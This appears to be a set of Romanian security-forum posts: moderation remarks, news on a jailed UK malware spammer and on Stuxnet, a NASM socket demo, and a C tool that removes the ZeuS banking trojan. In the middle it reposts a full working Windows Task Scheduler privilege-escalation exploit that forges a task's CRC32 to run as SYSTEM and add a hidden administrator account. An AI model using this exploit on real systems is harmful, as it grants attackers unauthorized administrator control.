Nytro

1) Cu ce te ajuta asta? 2) Sunt intrebari care nu primesc nici un raspuns, in veci, ai atata rabdare? De ce sa nu se raspunda la o intrebare? 3) Care e rostul, invatam sa numaram? Idei stupide.

Dupa cum observati, categoria Offtopic este foarte vizitata, deoarece acolo se posteaza tot felul de lucruri, mai mult sau mai putin utile. Problema apare cand se posteaza si lucruri care isi au locul in alta parte, de cele mai multe ori cererile de diverse lucruri si cererea ajutorului in diverse probleme. Aceste subiecte au categorii speciale in care sa se poata posta, "Cereri" si "Ajutor". Nu vad de ce sa se posteze totul la "Offtopic". Sectiunea este pentru posturile care nu se incadreaza in alte categorii. Desigur, cred ca sunt mai mari sansele sa primiti un raspuns la "Offtopic" decat la locul special, pentru ca e o categorie mai vizitata, dar se va ajunge la balamuc astfel. Dupa cum o parte dintre voi ati observat, daca veti posta intr-o categorie gresita (nu numai la "Offtopic") veti primi un avertisment. Asadar, inainte de a deschide un topic, cititi si numele categoriilor, si descrierile lor daca nu ati inteles ce anume se posteaza in acele categorii. Intr-adevar, daca doriti sa postati un tutorial despre programare, nu va voi sanctiona daca alegeti sa il postati la "Tutoriale Romana/Engleza" sau "Programare", din simplul motiv ca se incadreaza in ambele categorii si in plus este si ceva util care ajuta membrii forumului. Insa daca veti posta toate prostiile anapoda veti fi avertizati. Inca o data, putina atentie inainte de a posta.

Modul de vedere ("Birds eye") din satelit e excelent. Incercati, sunt sigur ca o sa va placa. http://www.bing.com/maps/ Sincer, nu se compara Yahoo! si Google cu asa ceva... 1 - 0 pentru Microsoft din partea mea.

Probabil trimiti si tu 20 de mailuri cu istealer sa furi niste parole de messenger... Nu te speria, pe tine nu o sa te bage nimeni in seama. Da, daca cineva iti fura portofelul vrei sa intre la puscarie, daca cineva iti fura banii din cont de ce sa nu intre la puscarie? De fapt voi ati merita sa infundati puscariile, macar cei ce fura portofele "muncesc" sa le aiba, voi luati 2 programe care nu stiti ce fac si gata, sunteti hackeri cu bani. La cateva sute de euro nu se uita nimeni, daca ai fi baiat destept si ai face mai mult acum as posta o stire despre tine, dar sunt sigur ca nu o sa fie cazul.

"""Hacker""" Gets 18 Months in U.K. Prison Mai bine spus "Looser". Bun, am mai scapat de un hot. La puscarie cu toti cei ca el, la munca nu la intins mana. A Scottish man was sentenced today to 18 months in prison for spamming out e-mails laced with malware and stealing data. A 33-year-old Scottish man was sentenced today to 18 months in prison in the U.K. for spamming out malware-infected e-mails and stealing data. The sentencing today of Matthew Anderson of Drummuir, Aberdeenshire, Scotland, brought to an end to an investigation first launched four years ago. According to the Metropolitan Police Service (MPS), Anderson was part of a ring that targeted hundreds of businesses in the U.K. with malware starting in 2005. The conspiracy was operated by members of a cyber-crew called m00p that spammed out millions of e-mails laced with malware, authorities said. It was Anderson's job to manage the operation by composing the e-mails and distributing them with virus attachments, police said. The malware allowed Anderson to access private data stored on computers without the knowledge of the computer's owner, according to police. "This organized online criminal network infected huge numbers of computers around the world, especially targeting U.K. businesses and individuals," said Detective Constable Bob Burls, from the MPS Central e-Crime Unit, in a statement. "Matthew Anderson methodically exploited computer users not only for his own financial gain but also violating their privacy. They used sophisticated computer code to commit their crimes." The investigation resulted in the arrests of three men—including Anderson—on June 27, 2006. No charges were filed against one of the men, while the other pleaded guilty in 2008, according to reports. According to police, a number of computers were seized at residential addresses in both countries in addition to the suspects' servers as part of the investigation. When online, Anderson used the profile names of "aobuluz" and "warpigs," authorities said, and operated his illegal business behind the front of an online company called Optom Security that offered security software. Among the evidence police found were screenshots on Anderson's computers taken from other people's Webcams as well as copies of wills, medial reports, password lists and other content, police said. "The Internet means criminals have increased opportunities to commit crime internationally; however, I'd like to reassure the public that the international law enforcement and antivirus companies' response is increasingly sophisticated," Burls said. "As this case shows, criminals can't hide online and are being held to account for their actions. A complex investigation like this demonstrates what international cooperation can achieve." Sursa: Hacker Gets 18 Months in U.K. Prison - Security - News & Reviews

Exploit code for one of the zero-day vulnerabilities exploited by Stuxnet Exploit code for one of the zero-day vulnerabilities exploited by the Stuxnet worm has made its way online. The code exploits a Windows Task Scheduler vulnerability, and can be used to escalate privileges. The exploit code was added to the Exploit Database operated by Offensive Security Nov. 20. There is no patch currently available for the flaw, though Microsoft said one is forthcoming. “Microsoft is aware of the public posting of the details of an Elevation of Privilege vulnerability used by the Stuxnet malware,” Jerry Bryant, group manager of Response Communications at Microsoft, said in a statement. “We first discussed this vulnerability in September 2010. Because this is a local Elevation-of-Privilege issue, it requires attackers to be already able to execute code on a targeted machine. A bulletin addressing this issue will be released as part of our regular monthly bulletin cycle in the near future.” The vulnerability was one of four zero-days used by the malware in its bid to compromise industrial control systems. The three others have all been patched since the worm was discovered this summer. Researchers have spent the last several months trying to get to the bottom of the Stuxnet worm. Just recently, Symantec reported evidence that it targets frequency converter drives used to control the speed of motors, and that the actual goal of the worm may be to disrupt nuclear programs. In particular, speculation has focused on Iran as a possible target, as it has been the site of many of Stuxnet's infections. Among the other zero-days Stuxnet has been observed using are the .LNK shortcut vulnerability, patched in August; a vulnerability in the Windows Print Spooler service (MS10-061), patched in September; and another privilege escalation issue (MS10-073), patched in a massive update in October. Early versions of the worm also spread without a vulnerability at all; instead abusing How Stuxnet Malware Used AutoRun Trick to Infect PCs - Security - News & Reviews to compromise machines through infected USB devices. Sursa: Exploit Code for Windows Zero-Day Targeted by Stuxnet Goes Public - Security - News & Reviews

Windows Task Scheduler Privilege Escalation 0day # Exploit Title: Windows Task Scheduler Privilege Escalation 0day # Date: 20-11-2010 # Author: webDEViL # Tested on: Windows 7/2008 x86/x64 <job id="tasksch-wD-0day"> <script language="Javascript"> crc_table = new Array( 0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE, 0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B, 0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924, 0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01, 0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2, 0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F, 0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8, 0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5, 0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236, 0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713, 0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C, 0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9, 0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D ); var hD='0123456789ABCDEF'; function dec2hex(d) { h=''; for (i=0;i<8;i++) { h = hD.charAt(d&15)+h; d >>>= 4; } return h; } function encodeToHex(str){ var r=""; var e=str.length; var c=0; var h; while(c<e){ h=str.charCodeAt(c++).toString(16); while(h.length<3) h="0"+h; r+=h; } return r; } function decodeFromHex(str){ var r=""; var e=str.length; var s=0; while(e>1){ r=r+String.fromCharCode("0x"+str.substring(s,s+2)); s=s+2; e=e-2; } return r; } function calc_crc(anyForm) { anyTextString=decodeFromHex(anyForm); Crc_value = 0xFFFFFFFF; StringLength=anyTextString.length; for (i=0; i<StringLength; i++) { tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF; Table_value = crc_table[tableIndex]; Crc_value >>>= 8; Crc_value ^= Table_value; } Crc_value ^= 0xFFFFFFFF; return dec2hex(Crc_value); } function rev_crc(leadString,endString,crc32) { // // First, we calculate the CRC-32 for the initial string // anyTextString=decodeFromHex(leadString); Crc_value = 0xFFFFFFFF; StringLength=anyTextString.length; //document.write(alert(StringLength)); for (var i=0; i<StringLength; i++) { tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF; Table_value = crc_table[tableIndex]; Crc_value >>>= 8; Crc_value ^= Table_value; } // // Second, we calculate the CRC-32 without the final string // crc=parseInt(crc32,16); crc ^= 0xFFFFFFFF; anyTextString=decodeFromHex(endString); StringLength=anyTextString.length; for (var i=0; i<StringLength; i++) { tableIndex=0; Table_value = crc_table[tableIndex]; while (((Table_value ^ crc) >>> 24) & 0xFF) { tableIndex++; Table_value = crc_table[tableIndex]; } crc ^= Table_value; crc <<= 8; crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1); } // // Now let's find the 4-byte string // for (var i=0; i<4; i++) { tableIndex=0; Table_value = crc_table[tableIndex]; while (((Table_value ^ crc) >>> 24) & 0xFF) { tableIndex++; Table_value = crc_table[tableIndex]; } crc ^= Table_value; crc <<= 8; crc |= tableIndex; } crc ^= Crc_value; // // Finally, display the results // var TextString=dec2hex(crc); var Teststring=''; Teststring=TextString.substring(6,8); Teststring+=TextString.substring(4,6); Teststring+=TextString.substring(2,4); Teststring+=TextString.substring(0,2); return Teststring } function decodeFromHex(str){ var r=""; var e=str.length; var s=0; while(e>1){ r=r+String.fromCharCode("0x"+str.substring(s,s+2)); s=s+2; e=e-2; } return r; } </script> <script language="VBScript"> dim output set output = wscript.stdout output.writeline " Task Scheduler 0 day - Privilege Escalation " output.writeline " Should work on Vista/Win7/2008 x86/x64" output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat" Set objShell = CreateObject("WScript.Shell") objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True Set fso = CreateObject("Scripting.FileSystemObject") Set a = fso.CreateTextFile(biatchFile, True) a.WriteLine ("net user /add test123 test123") a.WriteLine ("net localgroup administrators /add test123") a.WriteLine ("schtasks /delete /f /TN wDw00t") Function ReadByteArray(strFileName) Const adTypeBinary = 1 Dim bin Set bin = CreateObject("ADODB.Stream") bin.Type = adTypeBinary bin.Open bin.LoadFromFile strFileName ReadByteArray = bin.Read 'output.writeline ReadByteArray End Function Function OctetToHexStr (arrbytOctet) Dim k OctetToHexStr = "" For k = 3 To Lenb (arrbytOctet) OctetToHexStr = OctetToHexStr _ & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2) Next End Function strFileName="C:\windows\system32\tasks\wDw00t" hexXML = OctetToHexStr (ReadByteArray(strFileName)) 'output.writeline hexXML crc32 = calc_crc(hexXML) output.writeline "Crc32 Original: "+crc32 Set xmlDoc = CreateObject("Microsoft.XMLDOM") 'permissions workaround 'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True 'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True Set objShell = WScript.CreateObject("WScript.Shell") Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t") Do Until objExecObject.StdOut.AtEndOfStream strLine = strLine & objExecObject.StdOut.ReadLine() Loop hexXML = "FFFE3C00"+OctetToHexStr(strLine) 'output.writeline hexXML Set ts = fso.createtextfile ("wDw00t.xml") For n = 1 To (Len (hexXML) - 1) step 2 ts.write Chr ("&h" & Mid (hexXML, n, 2)) Next ts.close xmlDoc.load "wDw00t.xml" Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author") Author.text = "LocalSystem" Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId") UserId.text = "S-1-5-18" xmldoc.save(strFileName) hexXML = OctetToHexStr (ReadByteArray(strFileName)) leadString=hexXML+"3C0021002D002D00" endString="2D002D003E00" 'output.writeline leadString impbytes=rev_crc(leadString,endString,crc32) output.writeline "Crc32 Magic Bytes: "+impbytes finalString = leadString+impbytes+endString forge = calc_crc(finalString) output.writeline "Crc32 Forged: "+forge strHexString="FFFE"+finalString Set fso = CreateObject ("scripting.filesystemobject") Set stream = CreateObject ("adodb.stream") Set ts = fso.createtextfile (strFileName) For n = 1 To (Len (strHexString) - 1) step 2 ts.write Chr ("&h" & Mid (strHexString, n, 2)) Next ts.close Set objShell = CreateObject("WScript.Shell") objShell.Run "schtasks /change /TN wDw00t /disable",,True objShell.Run "schtasks /change /TN wDw00t /enable",,True objShell.Run "schtasks /run /TN wDw00t",,True </script> </job> E exploit-ul folosit de worm-ul Stuxnet. Sursa: Windows Task Scheduler Privilege Escalation 0day

MinGW e portarea (nu completa cred) a compilatorului GNU pentru Linux pe sisteme Windows. Si compilatoarele GNU respecta cel mai bine standardele internationale, nu ca produsele marca Microsoft care vin cu propriile idei.

Inca un topic demn de gunoi. Mai bine facea un browser, macar era facut de el...

E foarte bine pentru inceput, continua, vreau sa vad player-ul.

Facusem eu ceva pentru Linux, din iptables. Ideea e simpla. Din cate mi-am dat seama, cred ca trimite un bot (sunt multi, nu cred ca ii poti baga la ignore pe toti, na, poate nu vrei sa ii bagi la ignore pe toti care nu ii ai in lista, si nu stiu daca asta chiar va ajuta) un mesaj de "am schimbat avataru ba", si clientul de messenger trimite un raspuns, cam asa ceva, dar nu sunt sigur. Si eu am blocat accesul (DROP la pachete) de la sau catre (nu mai stiu) anumite IP-uri, care ulterior am descoperit ca sunt servere Yahoo!. Si intr-adevar, nu mai detectau daca sunt pe invizibil sau nu, dar nici nu mai primeam sau nu puteam trimite mesaje, sau cine stie ce alte probleme erau. Oricum, cred ca se poate face ceva. PS: Nu prea ma pricep, din iptables se pot face limitari in functie de continutul unui pachet, adica in functie de date? Ar fi de preferat ceva simplu cum ar fi "daca pachetul contine sirul/octetii xyz"... Sau orice altceva.

Da, ce bucurie, gasesti site-ul lu' nea Vasile si "il spargi"... Daca tot vreti sa va testati capacitatile, testati-le pe un site pe care aveti un motiv sa le testati, nu cautati acolo niste site-uri de 2 lei ca sa aveti ce posta la Show Off...

Din titlu, descriere si site-urile recomandate pare o mare, al dracu de mare, tampenie de doi lei.

Exista lucruri mai importante pe lume decat sa stai sa citesti posturi stupide, sa dai banuri sau avertismente

Da, e bine gandita

Imi place cum arata. Da, util.

Nu i-am dat ban pentru asta, i-am dat ban pentru postul cu Madalina Manole si inca 3-4 posturi stupide. Vezi toate posturile lui.

Nu, incet, incet scapam de rebuturi.

Pff ce tutoriale...

Cata inteligenta in taberele adverse. Ce te-a determinat sa faci acea exclamatie? Sunt dinamovist, ar trebui sa ma simt insultat de injuriile aduse de probabil un pusti stelist care nici macar nu merge la meciurile echipei pe care pretinde ca o sustine? Ca tot veni vorba, cine vine la meciul cu Poli la peluze, la PCH?

Sunt un gras, plin de cosuri si port ochelari. M-ai jignit. Ban? Nu ai inceput cu dreptul, un pas bun de facut ar fi sa iti ceri scuze pentru injuriile aduse si sa iti faci o mica autodescriere care sa o inlocuiasca pe cea care ne-am facut-o deja despre tine.

[NASM] Linux Sockets Author: DemonEmporer: Right so, It's been a while since I actually contributed anything. Declans Wind0ze hatin'(j/k j/k lol) got me thinkin' about somethin' I could do in linux. And reading through a few pages I noticed a lack of linux based ASM or NASM for that matter. You may find this educational, silly or totally random or all 3. Either way. So I thought in my spare time, I'd start doing some NASM linux examples(They are linux specific, not *nix. BSD has a different interpret style). Hello worlds aside I thought I'd do something slightly more interesting and throw in a socket connection. %assign SOCK_STREAM 1 %assign AF_INET 2 %assign SYS_socketcall 102 %assign SYS_SOCKET 1 %assign SYS_CONNECT 3 %assign SYS_SEND 9 %assign SYS_RECV 10 section .text global _start ;-------------------------------------------------- ;Functions to make things easier. :] ;-------------------------------------------------- _socket: mov [cArray+0], dword AF_INET mov [cArray+4], dword SOCK_STREAM mov [cArray+8], dword 0 mov eax, SYS_socketcall mov ebx, SYS_SOCKET mov ecx, cArray int 0x80 ret _connect: call _socket mov dword [sock], eax mov dx, si mov byte [edi+3], dl mov byte [edi+2], dh mov [cArray+0], eax ;sock; mov [cArray+4], edi ;&sockaddr_in; mov edx, 16 mov [cArray+8], edx ;sizeof(sockaddr_in); mov eax, SYS_socketcall mov ebx, SYS_CONNECT mov ecx, cArray int 0x80 ret _send: mov edx, [sock] mov [sArray+0],edx mov [sArray+4],eax mov [sArray+8],ecx mov [sArray+12], dword 0 mov eax, SYS_socketcall mov ebx, SYS_SEND mov ecx, sArray int 0x80 ret _exit: mov eax, 1 int 0x80 _print: mov ebx, 1 mov eax, 4 int 0x80 ret ;-------------------------------------------------- ;Main code body ;-------------------------------------------------- _start: mov esi, szIp mov edi, sockaddr_in xor eax,eax xor ecx,ecx xor edx,edx .cc: xor ebx,ebx .c: lodsb inc edx sub al,'0' jb .next imul ebx,byte 10 add ebx,eax jmp short .c .next: mov [edi+ecx+4],bl inc ecx cmp ecx,byte 4 jne .cc mov word [edi], AF_INET mov esi, szPort xor eax,eax xor ebx,ebx .nextstr1: lodsb test al,al jz .ret1 sub al,'0' imul ebx,10 add ebx,eax jmp .nextstr1 .ret1: xchg ebx,eax mov [sport], eax mov si, [sport] call _connect cmp eax, 0 jnz short _fail mov eax, msg mov ecx, msglen call _send call _exit _fail: mov edx, cerrlen mov ecx, cerrmsg call _print call _exit _recverr: call _exit _dced: call _exit section .data cerrmsg db 'failed to connect ',0xa cerrlen equ $-cerrmsg msg db 'DIE DIE DIE!',0xa msglen equ $-msg szIp db '127.0.0.1',0 szPort db '256',0 section .bss sock resd 1 ;general 'array' for syscall_socketcall argument arg. cArray resd 1 resd 1 resd 1 resd 1 ;send 'array'. sArray resd 1 resd 1 resd 1 resd 1 ;duh? sockaddr_in resb 16 ;.. sport resb 2 buff resb 1024 Assemble: nasm -o socket.o -f elf32 -g socket.asm Link: ld -o socket socket.o It uses 0 external libraries, hence the ld link line. Next time, we might do something with GTK(QT has a CPP interface and is more annoying to call from ASM XD). If you have any questions, feel free to ask and I'll answer as best I can.

[C] ZeuS Killer Author: Nu stiu... #include <windows.h> #pragma warning(disable : 4005) // macro redefinition #include <ntdll.h> #pragma warning(default : 4005) #include <shlwapi.h> #include <shlobj.h> void GetZeusInfo(ULONG dwArg, PCHAR lpOut, DWORD dwOutLn, PCHAR lpMutex, DWORD dwMutexLn) { PSYSTEM_HANDLE_INFORMATION shi = 0; NTSTATUS Status = 0; ULONG len = 0x2000; POBJECT_NAME_INFORMATION obn = 0; HANDLE proc = 0, thandle = 0, hFile = 0; BOOLEAN enable = FALSE; UCHAR name[300] = {0}; ULONG temp = 0, rw = 0; do { shi = (PSYSTEM_HANDLE_INFORMATION)malloc(len); if (shi == 0) { return; } Status = NtQuerySystemInformation(SystemHandleInformation, shi, len, NULL); if (Status == STATUS_INFO_LENGTH_MISMATCH) { free(shi); len *= 2; } else if (NT_ERROR(Status)) { free(shi); return; } } while (Status == STATUS_INFO_LENGTH_MISMATCH); RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, 1, 0, &enable); for (int i=0; i<(int)shi->uCount; i++) { proc = OpenProcess(PROCESS_DUP_HANDLE, FALSE, shi->aSH[i].uIdProcess); if (proc == 0) { continue; } Status = NtDuplicateObject(proc, (HANDLE)shi->aSH[i].Handle, NtCurrentProcess(), &thandle, 0, 0, DUPLICATE_SAME_ACCESS); if (NT_ERROR(Status)) { NtClose(proc); continue; } Status = NtQueryObject(thandle, ObjectNameInformation, 0, 0, &len); if (Status != STATUS_INFO_LENGTH_MISMATCH || len == 0) { NtClose(thandle); NtClose(proc); continue; } obn = (POBJECT_NAME_INFORMATION)malloc(len); if (obn == 0) { NtClose(thandle); NtClose(proc); continue; } Status = NtQueryObject(thandle, ObjectNameInformation, obn, len, &len); if (NT_ERROR(Status) || obn->Name.Buffer == 0) { free(obn); NtClose(thandle); NtClose(proc); continue; } RtlZeroMemory(name, sizeof(name)); WideCharToMultiByte(CP_ACP, 0, obn->Name.Buffer, obn->Name.Length >> 1, (LPSTR)name, 300, NULL, NULL); if (strstr((LPSTR)name, "__SYSTEM__") || strstr((LPSTR)name, "_AVIRA_")) { lstrcpyW((LPWSTR)name, L"\\\\.\\pipe\\"); lstrcatW((LPWSTR)name, obn->Name.Buffer); __retry: hFile = CreateFileW((LPWSTR)name, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); if (hFile == INVALID_HANDLE_VALUE) { WaitNamedPipeW((LPWSTR)name, INFINITE); hFile = CreateFileW((LPWSTR)name, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); if (hFile == INVALID_HANDLE_VALUE) { WCHAR wszBNO[] = { L"\\BaseNamedObjects\\" }; if (LPWSTR wszBNOPos = StrStrW((LPWSTR)name, wszBNO)) { lstrcpyW((LPWSTR)name, L"\\\\.\\pipe\\"); lstrcatW((LPWSTR)name, (LPWSTR)((PBYTE)wszBNOPos + (sizeof(wszBNO) - 1 * sizeof(WCHAR)))); goto __retry; } free(obn); NtClose(thandle); NtClose(proc); continue; } } temp = PIPE_READMODE_MESSAGE; if (!SetNamedPipeHandleState(hFile, &temp, 0, 0)) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } temp = dwArg; if (!WriteFile(hFile, &temp, 4, &rw, 0)) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } temp = 0; if (!WriteFile(hFile, &temp, 4, &rw, 0)) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } temp = 0; if (!WriteFile(hFile, &temp, 0, &rw, 0)) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } temp = 0; if (!ReadFile(hFile, &temp, 4, &rw, 0)) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } temp = 0; if (!ReadFile(hFile, &temp, 4, &rw, 0)) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } if (temp > MAX_PATH) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } rw = temp; temp = (ULONG)malloc(temp); if (!temp) { CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } if (!ReadFile(hFile, (PVOID)temp, rw, &rw, 0)) { free((PVOID)temp); CloseHandle(hFile); free(obn); NtClose(thandle); NtClose(proc); continue; } if ( (temp) && lstrlenW((LPCWSTR)temp) < (int)dwOutLn) { RtlZeroMemory(lpOut, dwOutLn); WideCharToMultiByte(CP_ACP, 0, (PWCHAR)temp, lstrlenW((LPCWSTR)temp), (LPSTR)lpOut, dwOutLn, NULL, NULL); } if (lpMutex) { LPWSTR lpwMutexName = obn->Name.Buffer; LPWSTR lpwTemp; while (lpwTemp = StrStrW(lpwMutexName, L"\\")) { lpwMutexName = lpwTemp + 1; } RtlZeroMemory(lpMutex, dwMutexLn); WideCharToMultiByte(CP_ACP, 0, lpwMutexName, lstrlenW(lpwMutexName), (LPSTR)lpMutex, dwMutexLn, NULL, NULL); } free((PVOID)temp); CloseHandle(hFile); } free(obn); NtClose(thandle); NtClose(proc); } } BOOL DeleteHiddenFile(PCHAR szPath) { SetFileAttributes(szPath, FILE_ATTRIBUTE_ARCHIVE); return DeleteFile(szPath); } #define ZEUS_FASTCLEAN BOOL KillZeus() { // Getting info CHAR szMutexName[MAX_PATH] = {0}; CHAR szZeusPath[MAX_PATH]; GetZeusInfo(11, szZeusPath, sizeof szZeusPath, szMutexName, sizeof szMutexName); if (!strlen(szMutexName)) { #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : ERROR : Cannot get szMutexName"); #endif return FALSE; } #ifndef ZEUS_FASTCLEAN CHAR szZeusConfig[MAX_PATH]; GetZeusInfo(12, szZeusConfig, sizeof szZeusConfig, NULL, NULL); CHAR szZeusLog[MAX_PATH]; GetZeusInfo(13, szZeusLog, sizeof szZeusLog, NULL, NULL); #endif #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : INFO : 0.) Mutex \"%s\"", szMutexName); OutputDebugStringEx(__FUNCTION__" : INFO : 1.) Path \"%s\"", szZeusPath); #ifndef ZEUS_FASTCLEAN OutputDebugStringEx(__FUNCTION__" : INFO : 2.) Config \"%s\"", szZeusConfig); OutputDebugStringEx(__FUNCTION__" : INFO : 3.) Log \"%s\"", szZeusLog); #endif #endif // Killing GetZeusInfo(3, NULL, NULL, NULL, NULL); // Waiting HANDLE hMutex; for (INT i = 0; i < 10; i++) { hMutex = OpenMutex(MUTANT_QUERY_STATE|SYNCHRONIZE|STANDARD_RIGHTS_REQUIRED, FALSE, szMutexName); if (!hMutex) break; CloseHandle(hMutex); Sleep(1000); } if (hMutex) { #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : ERROR : hMutex is still active"); #endif return FALSE; } // Deleting files if (!DeleteHiddenFile(szZeusPath)) { #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusPath); #endif } #ifndef ZEUS_FASTCLEAN if (!DeleteHiddenFile(szZeusConfig)) { #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusConfig); #endif } if (!DeleteHiddenFile(szZeusLog)) { #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusLog); #endif } #endif #ifdef _DEBUGLITE OutputDebugStringEx(__FUNCTION__" : INFO : EXIT"); #endif return TRUE; }

